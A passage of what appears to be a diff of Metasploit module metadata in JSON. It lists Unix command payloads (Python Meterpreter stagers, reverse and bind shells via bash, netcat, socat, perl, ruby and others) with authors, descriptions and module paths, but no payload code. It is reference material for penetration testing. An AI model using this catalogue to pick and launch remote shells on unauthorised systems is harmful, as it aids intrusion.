"payload_cmd/unix/python/meterpreter/reverse_tcp_uuid": { + "name": "Python Exec, Python Meterpreter, Python Reverse TCP Stager with UUID Support", + "fullname": "payload/cmd/unix/python/meterpreter/reverse_tcp_uuid", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "OJ Reeves" + ], + "description": "Execute a Python payload from a command.\n\nRun a meterpreter server in Python (compatible with 2.5-2.7 & 3.1+).\n\nConnect back to the attacker with UUID Support", + "references": [], + "platform": "Unix", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-11-04 00:33:03 +0000", + "path": "/modules/payloads/adapters/cmd/unix/python.rb", + "is_install_path": true, + "ref_name": "cmd/unix/python/meterpreter/reverse_tcp_uuid", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/unix/python", + "adapted_refname": "python/meterpreter/reverse_tcp_uuid", + "staged": true, + "stage_refname": "python/meterpreter", + "stager_refname": "python/reverse_tcp_uuid" + }, + "payload_cmd/unix/python/meterpreter_bind_tcp": { + "name": "Python Exec, Python Meterpreter Shell, Bind TCP Inline", + "fullname": "payload/cmd/unix/python/meterpreter_bind_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre" + ], + "description": "Execute a Python payload from a command.\n\nConnect to the victim and spawn a Meterpreter shell", + "references": [], + "platform": "Unix", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-11-04 00:33:03 +0000", + "path": "/modules/payloads/adapters/cmd/unix/python.rb", + "is_install_path": true, + "ref_name": "cmd/unix/python/meterpreter_bind_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/unix/python", + "adapted_refname": "python/meterpreter_bind_tcp", + "staged": false + }, + "payload_cmd/unix/python/meterpreter_reverse_http": { + "name": "Python Exec, Python Meterpreter Shell, Reverse HTTP Inline", + "fullname": "payload/cmd/unix/python/meterpreter_reverse_http", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre" + ], + "description": "Execute a Python payload from a command.\n\nConnect back to the attacker and spawn a Meterpreter shell", + "references": [], + "platform": "Unix", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-11-04 00:33:03 +0000", + "path": "/modules/payloads/adapters/cmd/unix/python.rb", + "is_install_path": true, + "ref_name": "cmd/unix/python/meterpreter_reverse_http", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/unix/python", + "adapted_refname": "python/meterpreter_reverse_http", + "staged": false + }, + "payload_cmd/unix/python/meterpreter_reverse_https": { + "name": "Python Exec, Python Meterpreter Shell, Reverse HTTPS Inline", + "fullname": "payload/cmd/unix/python/meterpreter_reverse_https", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre" + ], + "description": "Execute a Python payload from a command.\n\nConnect back to the attacker and spawn a Meterpreter shell", + "references": [], + "platform": "Unix", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-11-04 00:33:03 +0000", + "path": "/modules/payloads/adapters/cmd/unix/python.rb", + "is_install_path": true, + "ref_name": "cmd/unix/python/meterpreter_reverse_https", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/unix/python", + "adapted_refname": "python/meterpreter_reverse_https", + "staged": false + }, + "payload_cmd/unix/python/meterpreter_reverse_tcp": { + "name": "Python Exec, Python Meterpreter Shell, Reverse TCP Inline", + "fullname": "payload/cmd/unix/python/meterpreter_reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre" + ], + "description": "Execute a Python payload from a command.\n\nConnect back to the attacker and spawn a Meterpreter shell", + "references": [], + "platform": "Unix", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-11-04 00:33:03 +0000", + "path": "/modules/payloads/adapters/cmd/unix/python.rb", + "is_install_path": true, + "ref_name": "cmd/unix/python/meterpreter_reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/unix/python", + "adapted_refname": "python/meterpreter_reverse_tcp", + "staged": false + }, + "payload_cmd/unix/python/pingback_bind_tcp": { + "name": "Python Exec, Python Pingback, Bind TCP (via python)", + "fullname": "payload/cmd/unix/python/pingback_bind_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "asoto-r7" + ], + "description": "Execute a Python payload from a command.\n\nListens for a connection from the attacker, sends a UUID, then terminates", + "references": [], + "platform": "Unix", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-11-04 00:33:03 +0000", + "path": "/modules/payloads/adapters/cmd/unix/python.rb", + "is_install_path": true, + "ref_name": "cmd/unix/python/pingback_bind_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/unix/python", + "adapted_refname": "python/pingback_bind_tcp", + "staged": false + }, + "payload_cmd/unix/python/pingback_reverse_tcp": { + "name": "Python Exec, Python Pingback, Reverse TCP (via python)", + "fullname": "payload/cmd/unix/python/pingback_reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "asoto-r7" + ], + "description": "Execute a Python payload from a command.\n\nConnects back to the attacker, sends a UUID, then terminates", + "references": [], + "platform": "Unix", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-11-04 00:33:03 +0000", + "path": "/modules/payloads/adapters/cmd/unix/python.rb", + "is_install_path": true, + "ref_name": "cmd/unix/python/pingback_reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/unix/python", + "adapted_refname": "python/pingback_reverse_tcp", + "staged": false + }, + "payload_cmd/unix/python/shell_bind_tcp": { + "name": "Python Exec, Command Shell, Bind TCP (via python)", + "fullname": "payload/cmd/unix/python/shell_bind_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "mumbai" + ], + "description": "Execute a Python payload from a command.\n\nCreates an interactive shell via Python, encodes with base64 by design. Compatible with Python 2.4-2.7 and 3.4+.", + "references": [], + "platform": "Unix", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-11-04 00:33:03 +0000", + "path": "/modules/payloads/adapters/cmd/unix/python.rb", + "is_install_path": true, + "ref_name": "cmd/unix/python/shell_bind_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/unix/python", + "adapted_refname": "python/shell_bind_tcp", + "staged": false + }, + "payload_cmd/unix/python/shell_reverse_sctp": { + "name": "Python Exec, Command Shell, Reverse SCTP (via python)", + "fullname": "payload/cmd/unix/python/shell_reverse_sctp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "RageLtMan " + ], + "description": "Execute a Python payload from a command.\n\nCreates an interactive shell via Python, encodes with base64 by design. Compatible with Python 2.6-2.7 and 3.4+.", + "references": [], + "platform": "Unix", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-11-04 00:33:03 +0000", + "path": "/modules/payloads/adapters/cmd/unix/python.rb", + "is_install_path": true, + "ref_name": "cmd/unix/python/shell_reverse_sctp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/unix/python", + "adapted_refname": "python/shell_reverse_sctp", + "staged": false + }, + "payload_cmd/unix/python/shell_reverse_tcp": { + "name": "Python Exec, Command Shell, Reverse TCP (via python)", + "fullname": "payload/cmd/unix/python/shell_reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "Ben Campbell " + ], + "description": "Execute a Python payload from a command.\n\nCreates an interactive shell via Python, encodes with base64 by design. Compatible with Python 2.4-2.7 and 3.4+.", + "references": [], + "platform": "Unix", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-11-04 00:33:03 +0000", + "path": "/modules/payloads/adapters/cmd/unix/python.rb", + "is_install_path": true, + "ref_name": "cmd/unix/python/shell_reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/unix/python", + "adapted_refname": "python/shell_reverse_tcp", + "staged": false + }, + "payload_cmd/unix/python/shell_reverse_tcp_ssl": { + "name": "Python Exec, Command Shell, Reverse TCP SSL (via python)", + "fullname": "payload/cmd/unix/python/shell_reverse_tcp_ssl", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "RageLtMan " + ], + "description": "Execute a Python payload from a command.\n\nCreates an interactive shell via Python, uses SSL, encodes with base64 by design. Compatible with Python 2.6-2.7 and 3.4+.", + "references": [], + "platform": "Unix", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-11-04 00:33:03 +0000", + "path": "/modules/payloads/adapters/cmd/unix/python.rb", + "is_install_path": true, + "ref_name": "cmd/unix/python/shell_reverse_tcp_ssl", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/unix/python", + "adapted_refname": "python/shell_reverse_tcp_ssl", + "staged": false + }, + "payload_cmd/unix/python/shell_reverse_udp": { + "name": "Python Exec, Command Shell, Reverse UDP (via python)", + "fullname": "payload/cmd/unix/python/shell_reverse_udp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "RageLtMan " + ], + "description": "Execute a Python payload from a command.\n\nCreates an interactive shell via Python, encodes with base64 by design. Compatible with Python 2.6-2.7 and 3.4+.", + "references": [], + "platform": "Unix", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-11-04 00:33:03 +0000", + "path": "/modules/payloads/adapters/cmd/unix/python.rb", + "is_install_path": true, + "ref_name": "cmd/unix/python/shell_reverse_udp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/unix/python", + "adapted_refname": "python/shell_reverse_udp", + "staged": false + }, + "payload_cmd/unix/reverse": { + "name": "Unix Command Shell, Double Reverse TCP (telnet)", + "fullname": "payload/cmd/unix/reverse", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "hdm " + ], + "description": "Creates an interactive shell through two inbound connections", + "references": [], + "platform": "Unix", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/cmd/unix/reverse.rb", + "is_install_path": true, + "ref_name": "cmd/unix/reverse", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_cmd/unix/reverse_awk": { + "name": "Unix Command Shell, Reverse TCP (via AWK)", + "fullname": "payload/cmd/unix/reverse_awk", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "espreto ", + "Ulisses Castro ", + "Gabriel Quadros " + ], + "description": "Creates an interactive shell via GNU AWK", + "references": [], + "platform": "Unix", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/cmd/unix/reverse_awk.rb", + "is_install_path": true, + "ref_name": "cmd/unix/reverse_awk", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_cmd/unix/reverse_bash": { + "name": "Unix Command Shell, Reverse TCP (/dev/tcp)", + "fullname": "payload/cmd/unix/reverse_bash", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "hdm " + ], + "description": "Creates an interactive shell via bash's builtin /dev/tcp.\n\n This will not work on circa 2009 and older Debian-based Linux\n distributions (including Ubuntu) because they compile bash\n without the /dev/tcp feature.", + "references": [], + "platform": "Unix", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/cmd/unix/reverse_bash.rb", + "is_install_path": true, + "ref_name": "cmd/unix/reverse_bash", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_cmd/unix/reverse_bash_telnet_ssl": { + "name": "Unix Command Shell, Reverse TCP SSL (telnet)", + "fullname": "payload/cmd/unix/reverse_bash_telnet_ssl", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "RageLtMan " + ], + "description": "Creates an interactive shell via mkfifo and telnet.\n This method works on Debian and other systems compiled\n without /dev/tcp support. This module uses the '-z'\n option included on some systems to encrypt using SSL.", + "references": [], + "platform": "Unix", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/cmd/unix/reverse_bash_telnet_ssl.rb", + "is_install_path": true, + "ref_name": "cmd/unix/reverse_bash_telnet_ssl", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_cmd/unix/reverse_bash_udp": { + "name": "Unix Command Shell, Reverse UDP (/dev/udp)", + "fullname": "payload/cmd/unix/reverse_bash_udp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "hdm ", + "bcoles " + ], + "description": "Creates an interactive shell via bash's builtin /dev/udp.\n\n This will not work on circa 2009 and older Debian-based Linux\n distributions (including Ubuntu) because they compile bash\n without the /dev/udp feature.", + "references": [], + "platform": "Unix", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/cmd/unix/reverse_bash_udp.rb", + "is_install_path": true, + "ref_name": "cmd/unix/reverse_bash_udp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_cmd/unix/reverse_jjs": { + "name": "Unix Command Shell, Reverse TCP (via jjs)", + "fullname": "payload/cmd/unix/reverse_jjs", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "conerpirate", + "bcoles " + ], + "description": "Connect back and create a command shell via jjs", + "references": [ + "URL-https://gtfobins.github.io/gtfobins/jjs/", + "URL-https://cornerpirate.com/2018/08/17/java-gives-a-shell-for-everything/", + "URL-https://h4wkst3r.blogspot.com/2018/05/code-execution-with-jdk-scripting-tools.html" + ], + "platform": "Unix", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/cmd/unix/reverse_jjs.rb", + "is_install_path": true, + "ref_name": "cmd/unix/reverse_jjs", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_cmd/unix/reverse_ksh": { + "name": "Unix Command Shell, Reverse TCP (via Ksh)", + "fullname": "payload/cmd/unix/reverse_ksh", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Wang Yihang " + ], + "description": "Connect back and create a command shell via Ksh. Note: Although Ksh is often\n available, please be aware it isn't usually installed by default.", + "references": [], + "platform": "Unix", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/cmd/unix/reverse_ksh.rb", + "is_install_path": true, + "ref_name": "cmd/unix/reverse_ksh", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_cmd/unix/reverse_lua": { + "name": "Unix Command Shell, Reverse TCP (via Lua)", + "fullname": "payload/cmd/unix/reverse_lua", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "xistence " + ], + "description": "Creates an interactive shell via Lua", + "references": [], + "platform": "Unix", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/cmd/unix/reverse_lua.rb", + "is_install_path": true, + "ref_name": "cmd/unix/reverse_lua", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_cmd/unix/reverse_ncat_ssl": { + "name": "Unix Command Shell, Reverse TCP (via ncat)", + "fullname": "payload/cmd/unix/reverse_ncat_ssl", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "C_Sto" + ], + "description": "Creates an interactive shell via ncat, utilizing ssl mode", + "references": [], + "platform": "Unix", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/cmd/unix/reverse_ncat_ssl.rb", + "is_install_path": true, + "ref_name": "cmd/unix/reverse_ncat_ssl", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_cmd/unix/reverse_netcat": { + "name": "Unix Command Shell, Reverse TCP (via netcat)", + "fullname": "payload/cmd/unix/reverse_netcat", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "m-1-k-3", + "egypt ", + "juan vazquez " + ], + "description": "Creates an interactive shell via netcat", + "references": [], + "platform": "Unix", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/cmd/unix/reverse_netcat.rb", + "is_install_path": true, + "ref_name": "cmd/unix/reverse_netcat", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_cmd/unix/reverse_netcat_gaping": { + "name": "Unix Command Shell, Reverse TCP (via netcat -e)", + "fullname": "payload/cmd/unix/reverse_netcat_gaping", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "hdm " + ], + "description": "Creates an interactive shell via netcat", + "references": [], + "platform": "Unix", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/cmd/unix/reverse_netcat_gaping.rb", + "is_install_path": true, + "ref_name": "cmd/unix/reverse_netcat_gaping", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_cmd/unix/reverse_nodejs": { + "name": "Unix Command Shell, Reverse TCP (via nodejs)", + "fullname": "payload/cmd/unix/reverse_nodejs", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "joev " + ], + "description": "Continually listen for a connection and spawn a command shell via nodejs", + "references": [], + "platform": "Unix", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/cmd/unix/reverse_nodejs.rb", + "is_install_path": true, + "ref_name": "cmd/unix/reverse_nodejs", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_cmd/unix/reverse_openssl": { + "name": "Unix Command Shell, Double Reverse TCP SSL (openssl)", + "fullname": "payload/cmd/unix/reverse_openssl", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "hdm " + ], + "description": "Creates an interactive shell through two inbound connections", + "references": [], + "platform": "Unix", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/cmd/unix/reverse_openssl.rb", + "is_install_path": true, + "ref_name": "cmd/unix/reverse_openssl", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_cmd/unix/reverse_perl": { + "name": "Unix Command Shell, Reverse TCP (via Perl)", + "fullname": "payload/cmd/unix/reverse_perl", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "cazz " + ], + "description": "Creates an interactive shell via perl", + "references": [], + "platform": "Unix", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/cmd/unix/reverse_perl.rb", + "is_install_path": true, + "ref_name": "cmd/unix/reverse_perl", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_cmd/unix/reverse_perl_ssl": { + "name": "Unix Command Shell, Reverse TCP SSL (via perl)", + "fullname": "payload/cmd/unix/reverse_perl_ssl", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "RageLtMan " + ], + "description": "Creates an interactive shell via perl, uses SSL", + "references": [], + "platform": "Unix", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/cmd/unix/reverse_perl_ssl.rb", + "is_install_path": true, + "ref_name": "cmd/unix/reverse_perl_ssl", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_cmd/unix/reverse_php_ssl": { + "name": "Unix Command Shell, Reverse TCP SSL (via php)", + "fullname": "payload/cmd/unix/reverse_php_ssl", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "RageLtMan " + ], + "description": "Creates an interactive shell via php, uses SSL", + "references": [], + "platform": "Unix", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 20:39:52 +0000", + "path": "/modules/payloads/singles/cmd/unix/reverse_php_ssl.rb", + "is_install_path": true, + "ref_name": "cmd/unix/reverse_php_ssl", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_cmd/unix/reverse_python": { + "name": "Unix Command Shell, Reverse TCP (via Python)", + "fullname": "payload/cmd/unix/reverse_python", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "bcoles " + ], + "description": "Connect back and create a command shell via Python", + "references": [], + "platform": "Unix", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/cmd/unix/reverse_python.rb", + "is_install_path": true, + "ref_name": "cmd/unix/reverse_python", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_cmd/unix/reverse_python_ssl": { + "name": "Unix Command Shell, Reverse TCP SSL (via python)", + "fullname": "payload/cmd/unix/reverse_python_ssl", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "RageLtMan " + ], + "description": "Creates an interactive shell via python, uses SSL, encodes with base64 by design.", + "references": [], + "platform": "Unix", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/cmd/unix/reverse_python_ssl.rb", + "is_install_path": true, + "ref_name": "cmd/unix/reverse_python_ssl", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_cmd/unix/reverse_r": { + "name": "Unix Command Shell, Reverse TCP (via R)", + "fullname": "payload/cmd/unix/reverse_r", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "RageLtMan " + ], + "description": "Connect back and create a command shell via R", + "references": [], + "platform": "Unix", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/cmd/unix/reverse_r.rb", + "is_install_path": true, + "ref_name": "cmd/unix/reverse_r", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_cmd/unix/reverse_ruby": { + "name": "Unix Command Shell, Reverse TCP (via Ruby)", + "fullname": "payload/cmd/unix/reverse_ruby", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "kris katterjohn " + ], + "description": "Connect back and create a command shell via Ruby", + "references": [], + "platform": "Unix", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/cmd/unix/reverse_ruby.rb", + "is_install_path": true, + "ref_name": "cmd/unix/reverse_ruby", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_cmd/unix/reverse_ruby_ssl": { + "name": "Unix Command Shell, Reverse TCP SSL (via Ruby)", + "fullname": "payload/cmd/unix/reverse_ruby_ssl", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "RageLtMan " + ], + "description": "Connect back and create a command shell via Ruby, uses SSL", + "references": [], + "platform": "Unix", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/cmd/unix/reverse_ruby_ssl.rb", + "is_install_path": true, + "ref_name": "cmd/unix/reverse_ruby_ssl", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_cmd/unix/reverse_socat_sctp": { + "name": "Unix Command Shell, Reverse SCTP (via socat)", + "fullname": "payload/cmd/unix/reverse_socat_sctp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "RageLtMan " + ], + "description": "Creates an interactive shell via socat", + "references": [], + "platform": "Unix", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-04-27 16:21:34 +0000", + "path": "/modules/payloads/singles/cmd/unix/reverse_socat_sctp.rb", + "is_install_path": true, + "ref_name": "cmd/unix/reverse_socat_sctp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_cmd/unix/reverse_socat_tcp": { + "name": "Unix Command Shell, Reverse TCP (via socat)", + "fullname": "payload/cmd/unix/reverse_socat_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "jheysel-r7" + ], + "description": "Creates an interactive shell via socat", + "references": [], + "platform": "Unix", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-09-06 15:52:56 +0000", + "path": "/modules/payloads/singles/cmd/unix/reverse_socat_tcp.rb", + "is_install_path": true, + "ref_name": "cmd/unix/reverse_socat_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_cmd/unix/reverse_socat_udp": { + "name": "Unix Command Shell, Reverse UDP (via socat)", + "fullname": "payload/cmd/unix/reverse_socat_udp", + "aliases": [], + 